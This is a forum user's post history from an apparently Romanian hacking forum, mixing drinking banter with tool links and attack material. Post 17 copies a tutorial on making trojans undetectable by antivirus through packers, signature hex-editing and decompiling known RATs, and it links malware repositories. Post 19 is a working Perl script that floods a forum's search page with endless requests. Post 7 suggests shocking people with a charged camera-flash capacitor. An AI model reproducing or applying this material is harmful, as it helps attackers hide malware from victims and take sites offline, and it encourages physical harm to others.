Jump to content

virusz

Active Members
  • Posts

    1263
  • Joined

  • Last visited

  • Days Won

    7

Everything posted by virusz

  1. ori zbeng nu are somn la 3:44 ori sta in america....sau poate nu merge bine ceasul..ori eu is beat ori pe zbeng l-a luat zbenguiala .... raspunsul il poate da doar el ...
  2. virusz

    rwr

    ai mha ca e bine,,,,bea man cat poti..ca asa e vine,,, bafta la ficat
  3. mos io vreau sa faci un turotial video ..cum bei,..ci cum sa te imbeti mai repede... te rog.. ca io nu gasesc nici o metroda... ps: scuze dak intelegeti,.,, grea i tatsatra asta
  4. mersi
  5. dc nu ai pus o litza la una din bornele condensatorului... si bagai la 220.. se incarca + pusca litza, nu condensatorul...
  6. interesant... mersi! offtopic: nullbyte fa si tu unul cum vrei tu ..dar fa..(nici dupa ce ai facut sa nu comentezi)
  7. man.. e tare faza ..eu m-am dat seama dupa ce am pus un condensator la un motor ceva..si stiam ca l-am scos din priza... cand am pus mana am fost pe spate... + mai merge cu cava ..mult mai usor de folosit si de "gasit"... un aparat foto cu blitz.... scoatetzi "schema" aia din el.. faceti sa se incarce "blitzu" (bine blitzu il luati jos..firele numa ... si dupa ce se incarca bagatzi la careva pe piele.. e mai bun ca se incarca de la 3v ...bafta!
  8. orice ar fii..treaba e putreda la mijloc!... asa suntem noi...luam gratuit sursa, ii schimbam numele...si gata...e al nostru...
  9. program folosit: Adobe Audition download: http://download.softpedia.ro/dl/3c1ef5213506b7e4e7f3077a2c7e7d82/46ebd2ab/100012949/software/MULTIMEDIA/AUDIO/Adobe_Audition_2_0_Tryout.exe
  10. man..e tare ciudat crackme-u asta al tau.. are un mega si e si packed.. ce dreq de crackme e asta... cred ca ar fii mai bine sa il pui unpacked
  11. virusz

    Cati ani ai?

    mai 3 zile si fac si io 59 ..huh...
  12. virusz

    VREAu bani :D

    "ai incercat sa ii intrebi pe ei?"
  13. virusz

    VREAu bani :D

    astaa cu jocruile de noroc,cum sa le pacalesti si d'astea m-ar interesa si pe mine... + zbeng... munca frate!
  14. un site bunicel.. : http://www.tuts4you.com/ ps: posteaza si la linkuri careva!
  15. virusz

    rwr

    man.. numa ficat sa ai sa bei... las' ca pana te cheama datoria mai poti sa bei... hai noroc si dak mai poti: e mai fain cu amestecuri
  16. virusz

    rwr

    ia o sticla....
  17. M.U.T Making Undetectable Trojans By Ghosty In this tutorial I will be showing you 4 ways of how to make a Trojan undetectable to Anti-Virus software. I am sure there are more then 4, but these should help get you started. 1. Encryptors/Compressors: You would think this should be the easiest way to UD (Undetect) a Trojan...but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with. Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers. 2. Byte Adders: This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo. 3. Hex Editing: This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents. The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor. Step One: Place your Trojan Server in a folder. Step Two: Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean. Step Three: Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit. Step Four: Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again. Step Five: Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful. (Optional) Step Six: Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base). You have to remember that different AV software use different signatures, so scan with as many as you can. 4. Source: The very best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but it could be simpler then you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. Changing just a single string in the Source code can make it undetectable. Option 1: Free Trojan Source Code. Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to makes these undetectable. A simple recompile will sometimes do the trick. Option 2: Decompiling. Some may call this "Stealing" source code. I like to call it "Borrowing". The first thing you need to know is what language your Trojan is in. Lets say your Trojan was Optix Pro, your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and viola! Just change a few strings around within the source and you should have a undetectable Optix Pro. Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in a ASM compiler. That maybe a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them. A word of warning, if you do find your own way of making a Trojan undetectable, DO NOT disclose it. You will find your Trojan detected in a very short amount of time. What I have taught here are just the basics of Trojan UDing. It will be up to you to use this knowledge and make it work. Also, DO NOT use any online virus scans to see if your Trojan has been detected. Your signature will be captured and sent to AV companies. Well I hope this tutorial helped you out in some small way. Just one of the examples above could make an undetectable Trojan, or you may need to mix and match them. Try what you can, don't be afraid to experiment, and good luck! VXChaos: http://vxchaos.official.ws/ LeetUpload: http://www.leetupload.com VX Heaven: http://vx.netlux.org StealthTools v2.0: http://www.hackerscenter.com/directory.asp?id=31 AV Devil 2.1: http://rapidshare.com/files/64139338/AV_Devil_2.rar.html Planet Source Code: http://www.planet-source-code.com/ DeDe: http://www.woodmann.com/crackz/Tools.htm
  18. PIRAT is a Remote Administration Tool for people who use a router and can't use other Remote Administration Tools. since it is written in Perl, it supports Windows,Linux and Mac (untested) Homepage: http://sourceforge.net/projects/pirat/
  19. #!"c:\perl\bin\perl.exe" use Socket; if (@ARGV < 2) { &usage; } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) { $user="h4x0r".$rand.$i; $data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; $len = length $data; $foo = "POST ".$dir."search.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "|" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\tex: $0 127.0.0.1 /forum/\n"; print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n"; print "\th4x0r Security Team\n"; print "\twww.h4x0r.ir\n\n"; exit(); };
  20. eheee.. thx la aman2
  21. Homepage: http://rgirardin.mine.nu/ Binder: http://rgirardin.mine.nu/binder/v2.00 PHP Online encryptor: http://rgirardin.mine.nu/php-encryptor/v1.01 the online netinstaller: http://rgirardin.mine.nu/netinstaller/v1.10 Av tester: http://rgirardin.mine.nu/av_tester/v2.00 .... daca nu e bine la phack.. mutati careva la linkuri bafta!
  22. nu e problema prea mare... faci rost de ceva nedetectabil..
  23. o fii mai veche dar eu acum am observat... cum se face? ex: http://rstcenter.com/forum/frumoasa-idea-asta-cu-rst-in-loc-de-php-d-t8421.rst
  24. Numele spune tot... mie unu imi place... Info: Universal Extractor is a program do to exactly what it says: extract files from any type of archive, whether it's a simple zip file, an installation program, or even a Windows Installer (.msi) package. This is still a work in progress (see details below), but so far it's proven quite useful and I feel others can also benefit from it. I should stress that this application is not intended to be a general purpose archiving program. It will never replace WinRAR, 7-Zip, etc. What it will do is allow you to extract files from virtually any type of archive, regardless of source, compression method, etc. The original motivation behind this project was that I wanted an easy, convenient way to extract files from installation packages, such as Inno Setup or Windows Installer packages, without pulling up a command line every time. In the process I got a little carried away and ended up throwing in support for every kind of archive format I possibly could find. Universal Extractor, like most of my Windows programs, is written in AutoIt, a powerful open source scripting language. Universal Extractor itself, however, is just a front-end that uses many other programs to do the dirty work. Please see the Credits section below for additional information. Homepage: http://legroom.net/software/uniextract Download Installer: http://uniextract.c1pher.com/uniextract15.exe Download Zip: http://uniextract.c1pher.com/uniextract15_noinst.rar Download Source (autoit, bun pt HexString : http://uniextract.c1pher.com/uniextract15_source.rar More versions: http://uniextract.c1pher.com/archive/
×
×
  • Create New...